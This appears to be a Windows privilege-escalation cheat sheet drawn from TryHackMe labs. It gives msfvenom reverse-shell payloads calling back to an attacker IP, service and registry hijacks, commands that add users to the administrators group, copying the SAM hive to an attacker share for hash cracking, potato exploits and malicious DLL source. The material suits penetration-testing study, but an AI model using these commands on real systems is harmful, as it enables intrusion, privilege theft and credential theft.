
Windows Privesc

Tools

Reverse shell

Using msfvenom:

$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.9.52.128 LPORT=8888 -f exe -o revshell.exe

Using nishang.

Exploit suggester

Windows-Exploit-Suggester

$ git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester
$ cd Windows-Exploit-Suggester
$ python2 windows-exploit-suggester.py --update
$ # if xlrd is missing: python2 -m pip install xlrd==1.1.0
$ python2 windows-exploit-suggester.py --database 2021-12-11-mssb.xls --ostext 'Windows 2012 R2 (6.3 Build 9600)'
or
$ python2 windows-exploit-suggester.py --database 2021-12-11-mssb.xls --systeminfo sysinfo_output.txt

WES-NG

$ python3 -m pip install wesng
$ wesng --update

PS> systeminfo > systeminfo.txt

$ wesng systeminfo.txt

Metasploit

Post-exploitation module: multi/recon/local_exploit_suggester.

Services

Unquoted path

When a service's binary path is unquoted and contains spaces, Windows tries the following executables in turn, so the check below looks for write access to the directories in that chain:

  • C:\Program.exe
  • C:\Program Files\Unquoted.exe
  • C:\Program Files\Unquoted Path Service\Common.exe
  • C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe

C:\PrivEsc>sc qc unquotedsvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: unquotedsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Unquoted Path Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

# Check if we can write into the folder
C:\PrivEsc>accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"
C:\Program Files\Unquoted Path Service
  Medium Mandatory Level (Default) [No-Write-Up]
  RW BUILTIN\Users
  RW NT SERVICE\TrustedInstaller
  RW NT AUTHORITY\SYSTEM
  RW BUILTIN\Administrators

# Copy reverse shell
C:\PrivEsc>copy C:\Users\user\revshell.exe "C:\Program Files\Unquoted Path Service\Common.exe"
        1 file(s) copied.

C:\PrivEsc>net start unquotedsvc
...

Insecure service permissions

List permissions using sc:

C:\> sc sdshow <service>

D:(A;;CCLCSWLORC;;;AU)(A;;CCLCSWRPDTLOCRRCWDWO;;;BA)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)(A;;CCLCSWLORC;;;BU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

More information about security descriptors.
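
To read a `sc sdshow` string without decoding it by hand, here is a small Python SDDL checker, an added example that is not part of the original notes: it parses the DACL ACEs and flags any trustee other than SYSTEM or Administrators that holds rights allowing the service to be reconfigured (SERVICE_CHANGE_CONFIG, WRITE_DAC, WRITE_OWNER, GENERIC_ALL/GENERIC_WRITE). The right and SID abbreviations follow the SDDL specification; the first descriptor is the one shown above and the second is a constructed weak one.

```python
import re

ACE_RE = re.compile(r"\(([^)]*)\)")

# SDDL two-letter rights as they decode for a service object (specific rights
# 0x1..0x100 map to the SERVICE_* constants in winsvc.h).
SERVICE_RIGHTS = {
    "CC": "SERVICE_QUERY_CONFIG", "DC": "SERVICE_CHANGE_CONFIG",
    "LC": "SERVICE_QUERY_STATUS", "SW": "SERVICE_ENUMERATE_DEPENDENTS",
    "RP": "SERVICE_START", "WP": "SERVICE_STOP", "DT": "SERVICE_PAUSE_CONTINUE",
    "LO": "SERVICE_INTERROGATE", "CR": "SERVICE_USER_DEFINED_CONTROL",
    "SD": "DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
    "GA": "GENERIC_ALL", "GW": "GENERIC_WRITE", "GR": "GENERIC_READ", "GX": "GENERIC_EXECUTE",
}
# Rights that let the holder change what the service runs or who controls it.
RECONFIGURE_RIGHTS = {"DC", "WD", "WO", "GA", "GW"}
WELL_KNOWN_SIDS = {"AU": "Authenticated Users", "BA": "BUILTIN\\Administrators",
                   "SY": "NT AUTHORITY\\SYSTEM", "BU": "BUILTIN\\Users", "WD": "Everyone"}
TRUSTED_SIDS = {"BA", "SY"}   # expected to hold full control

# The descriptor from the `sc sdshow` output above, and a constructed weak one in
# which BUILTIN\Users has been granted SERVICE_CHANGE_CONFIG (the DC right).
PAGE_SDDL = ("D:(A;;CCLCSWLORC;;;AU)(A;;CCLCSWRPDTLOCRRCWDWO;;;BA)"
             "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)(A;;CCLCSWLORC;;;BU)"
             "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")
WEAK_SDDL = ("D:(A;;CCLCSWLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
             "(A;;CCDCLCSWRPWPDTLOCRRC;;;BU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")


def parse_dacl(sddl):
    """Return (ace_type, [right codes], sid) for every ACE in the DACL part only."""
    dacl = sddl.split("D:", 1)[1].split("S:", 1)[0]   # drop owner/group and SACL
    aces = []
    for body in ACE_RE.findall(dacl):
        ace_type, _flags, rights, _obj, _inherit_obj, sid = body.split(";")[:6]
        # Rights are either a run of two-letter codes or one raw hex mask.
        codes = [rights] if rights.startswith("0x") else [rights[i:i + 2] for i in range(0, len(rights), 2)]
        aces.append((ace_type, codes, sid))
    return aces


def risky_grants(sddl):
    """Allow-ACEs granting reconfiguration rights to a trustee other than SYSTEM/Administrators."""
    findings = []
    for ace_type, codes, sid in parse_dacl(sddl):
        if ace_type != "A" or sid in TRUSTED_SIDS:
            continue
        granted = [SERVICE_RIGHTS[c] for c in codes if c in RECONFIGURE_RIGHTS]
        if granted:
            findings.append((WELL_KNOWN_SIDS.get(sid, sid), granted))
    return findings
```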


List the permissions of a user using accesschk.exe:

C:\> accesschk.exe /accepteula -wuvc <service>

C:\> accesschk.exe /accepteula -wuvc daclsvc
RW daclsvc
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
        SERVICE_CHANGE_CONFIG
        SERVICE_INTERROGATE
        SERVICE_ENUMERATE_DEPENDENTS
        SERVICE_START
        SERVICE_STOP
        READ_CONTROL

SERVICE_CHANGE_CONFIG: change the service configuration.

# Check the service 'daclsvc' configuration (qc : query configuration)
C:\PrivEsc>sc qc daclsvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: daclsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\DACL Service\daclservice.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : DACL Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

# Change the binpath value
C:\PrivEsc>sc config daclsvc binpath="\"C:\Users\user\revshell.exe\""
[SC] ChangeServiceConfig SUCCESS

C:\PrivEsc>sc qc daclsvc
[...]
        BINARY_PATH_NAME   : "C:\Users\user\revshell.exe"
[...]

# Start the service 'daclsvc'
C:\PrivEsc>net start daclsvc

Faster way:

C:\> sc config daclsvc binpath= "net localgroup administrators user /add"
C:\> sc start daclsvc

# Then
C:\> net localgroup administrators

Insecure registry permissions

Set the service's ImagePath value in the registry:

C:\PrivEsc>sc qc regsvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: regsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\Insecure Registry Service\insecureregistryservice.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Insecure Registry Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

# regsvc service is writable by the "NT AUTHORITY\INTERACTIVE" group (essentially all logged-on users)
C:\PrivEsc>accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc
HKLM\System\CurrentControlSet\Services\regsvc
  Medium Mandatory Level (Default) [No-Write-Up]
  RW NT AUTHORITY\SYSTEM
        KEY_ALL_ACCESS
  RW BUILTIN\Administrators
        KEY_ALL_ACCESS
  RW NT AUTHORITY\INTERACTIVE
        KEY_ALL_ACCESS

# Add registry key to execute reverse shell
C:\PrivEsc>reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\Users\User\revshell.exe /f
The operation completed successfully.

C:\PrivEsc>net start regsvc
...

Insecure file permissions

The service binary is writable by all users (Everyone and BUILTIN\Users):

C:\PrivEsc>sc qc filepermsvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: filepermsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\File Permissions Service\filepermservice.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : File Permissions Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\PrivEsc>accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"
C:\Program Files\File Permissions Service\filepermservice.exe
  Medium Mandatory Level (Default) [No-Write-Up]
  RW Everyone
        FILE_ALL_ACCESS
  RW NT AUTHORITY\SYSTEM
        FILE_ALL_ACCESS
  RW BUILTIN\Administrators
        FILE_ALL_ACCESS
  RW WIN-QBA94KB3IOF\Administrator
        FILE_ALL_ACCESS
  RW BUILTIN\Users
        FILE_ALL_ACCESS

# Replace service binary file by a reverse shell
C:\PrivEsc>copy C:\Users\user\revshell.exe "C:\Program Files\File Permissions Service\filepermservice.exe"
Overwrite C:\Program Files\File Permissions Service\filepermservice.exe? (Yes/No/All): Yes
Yes
        1 file(s) copied.

C:\PrivEsc>net start filepermsvc
...

Autoruns

List autoruns:

C:\Users\user>wmic startup get caption,command
Caption         Command
SecurityHealth  %windir%\system32\SecurityHealthSystray.exe
My Program      "C:\Program Files\Autorun Program\program.exe"

If you can overwrite C:\Program Files\Autorun Program\program.exe, you can replace it with your reverse shell and wait for an administrator to log in.

AlwaysInstallElevated

You can use the AlwaysInstallElevated policy to install a Windows Installer package with elevated (system) privileges (see the Microsoft documentation).

To install a package with elevated (system) privileges, set the AlwaysInstallElevated value to "1" under both of the following registry keys:

  • HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
  • HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer

C:\Users\user>reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
C:\Users\user>reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

Exploitation:

# Attacker host
$ msfvenom -p windows/x64/shell_reverse_tcp \
    LHOST=10.9.52.138 LPORT=9000 -f msi -o reverse_installer.msi

# Victim host
c:\Users\user>msiexec /qn /i "C:\Users\user\reverse_installer.msi"

Application running as admin

PS C:\Users\user> tasklist /V | findstr paint
mspaint.exe 4352 RDP-Tcp#0 2 61,256 K Running WIN-QBA94KB3IOF\admin 0:00:10 Untitled - Paint

In MS Paint, use the File > Open dialog and type file://c:/windows/system32/cmd.exe as the file name; cmd.exe then starts as the user running Paint (here WIN-QBA94KB3IOF\admin).

Saved credentials

PS C:\Users\user> cmdkey /list

Currently stored credentials:

  Target: WindowsLive:target=virtualapp/didlogical
  Type: Generic
  User: 02nfpgrklkitqatu
  Local machine persistence

  Target: Domain:interactive=WIN-QBA94KB3IOF\admin
  Type: Domain Password
  User: WIN-QBA94KB3IOF\admin

PS C:\Users\user> runas /savecred /user:admin cmd.exe
Attempting to start cmd.exe as user "WIN-QBA94KB3IOF\admin" ...

Security Account Manager (SAM)

PS C:\Users\user> copy C:\Windows\Repair\SAM \\10.9.52.138\tmpshare
PS C:\Users\user> copy C:\Windows\Repair\SYSTEM \\10.9.52.138\tmpshare

Then:

$ git clone https://github.com/Tib3rius/creddump7
Cloning into 'creddump7'...
[...]
$ python3 creddump7/pwdump.py SYSTEM SAM
Administrator:500:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6ebaa6d5e6e601996eefe4b6048834c2:::
user:1000:aad3b435b51404eeaad3b435b51404ee:91ef1073f6ae95f5ea6ace91c09a963a:::
admin:1001:aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da:::
$ hashcat -m 1000 <hash> /usr/share/wordlists/rockyou.txt
[...]

Scheduled Tasks

Writable scripts

Startup apps

Folder "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp".

If writable, you can drop your reverse shell EXE there and wait for a higher-privileged user to log on.

Privileges

  • SeImpersonatePrivilege
  • SeAssignPrimaryTokenPrivilege
  • SeTcbPrivilege
  • SeBackupPrivilege
  • SeRestorePrivilege
  • SeCreateTokenPrivilege
  • SeLoadDriverPrivilege
  • SeTakeOwnershipPrivilege
  • SeDebugPrivilege

Docs: Access Tokens (Microsoft)

Two types of access tokens:

  • Primary access tokens: associated with a user account and generated at logon.
  • Impersonation tokens: allow a process (or a thread within it) to access resources using the security context of another (user/client) process.

Potato exploit (Rogue potato, Juicy potato, ...)

Rogue Potato:

  • >= Windows 10 1809
  • >= Windows Server 2019

Juicy Potato:

  • < Windows 10 1809
  • < Windows Server 2019

Privileges: SeAssignPrimaryTokenPrivilege or SeImpersonatePrivilege

Command to check privileges: whoami /priv

Exploitation:

Redirect attacker:135 to victim:9999:

  • sudo socat tcp-listen:135,reuseaddr,fork tcp:10.10.13.238:9999

Exploit Rogue Potato:

  • .\RoguePotato.exe -r <attacker_ip> -e "C:\path\reverse.exe" -l 9999

PrintSpoofer

Privileges: SeAssignPrimaryTokenPrivilege or SeImpersonatePrivilege

.\PrintSpoofer.exe -c "C:\Windows\System32\cmd.exe" -i

Tater (PowerShell implementation)

C:\> powershell.exe -nop -ep bypass
PS C:\> Import-Module C:\Users\User\Desktop\Tools\Tater\Tater.ps1
PS C:\> Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add"

# Check
PS C:\> net localgroup administrators

DLL Hijacking

  • https://docs.microsoft.com/en-us/sysinternals/downloads/procmon

DLL hijacking requires an application (typically an exe file) that either has a missing DLL file, or where the search order can be used to insert the malicious DLL file.

In summary, for standard desktop applications, Windows follows one of the orders listed below depending on whether SafeDllSearchMode is enabled.

If SafeDllSearchMode is enabled, the search order is as follows:

  1. The directory from which the application loaded.
  2. The system directory. Use the GetSystemDirectory function to get the path of this directory.
  3. The 16-bit system directory. There is no function that obtains the path of this directory, but it is searched.
  4. The Windows directory. Use the GetWindowsDirectory function to get the path of this directory.
  5. The current directory.
  6. The directories that are listed in the PATH environment variable. Note that this does not include the per-application path specified by the App Paths registry key. The App Paths key is not used when computing the DLL search path.

If SafeDllSearchMode is disabled, the search order is as follows:

  1. The directory from which the application loaded.
  2. The current directory.
  3. The system directory. Use the GetSystemDirectory function to get the path of this directory.
  4. The 16-bit system directory. There is no function that obtains the path of this directory, but it is searched.
  5. The Windows directory. Use the GetWindowsDirectory function to get the path of this directory.
  6. The directories that are listed in the PATH environment variable. Note that this does not include the per-application path specified by the App Paths registry key. The App Paths key is not used when computing the DLL search path.

Malicious DLL:

#include <windows.h>
#include <stdlib.h>   /* system() */

/* Entry point called by the loader; DLL_PROCESS_ATTACH fires when the
 * hijacked application first maps this DLL into its process. */
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved) {
    if (dwReason == DLL_PROCESS_ATTACH) {
        /* Record the account the host process runs as, as proof of execution. */
        system("cmd.exe /k whoami > C:\\Temp\\dll.txt");
        /* Terminate the host so the payload runs only once. */
        ExitProcess(0);
    }
    return TRUE;
}

Compile with the mingw cross-compiler (apt install gcc-mingw-w64-x86-64):

$ x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll

References

  • https://tryhackme.com/room/windows10privesc
  • https://tryhackme.com/room/winprivesc